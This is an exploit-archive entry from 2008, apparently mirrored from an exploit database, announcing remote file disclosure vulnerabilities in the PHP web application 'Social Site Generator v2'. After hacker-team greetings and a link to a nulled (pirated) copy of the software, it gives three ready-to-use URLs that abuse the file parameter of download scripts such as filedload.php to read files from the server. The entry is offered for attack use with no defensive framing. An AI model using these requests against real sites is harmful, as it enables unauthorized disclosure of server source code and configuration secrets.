[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Social Site Generator v2 Multiple Remote File Disclosure Vulnerabilities
# Published : 2008-06-01
# Author : Stack
# Previous Title : SMEweb 1.4b (SQL/XSS) Multiple Remote Vulnerabilities
# Next Title : ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability


############################################################################################
# 
# Application Name         : Social Site Generator
#
# Download                 : http://rapidshare.com/files/118424866/Social.Site.Generator.v2._iAG_.Nulled.rar
#
# Vulnerable Type          : Remote File disclouse
#
# Dork                     : search it :p
#
# Vulnerable file          : filedload.php
#
# author                   : Stack & Jadi
#
# Team                     : v4 Team http://v4-team.com
#
# THNX                     : ALLAH
#Greetz : Houssamix & Djekmani & Jadi & iuoisn &Room-Hackers All muslims HaCkeRs  :)
#                               www.v4-team.com     &    www.Real-Hack.com   &    www.Tryag.com
#
#
############################################################################################
< ------------------- Stack ------------------- >|
        /                                                          |
      /          Wanted                           |
    /__________________________________|

< -- Bug -- >
Exploit :
http://target/path/filedload.php?file=filedload.php
http://target/path/webadmin/download.php?file=download.php
http://target/path/webadmin/download_file.php

# www.Syue.com [2008-06-01]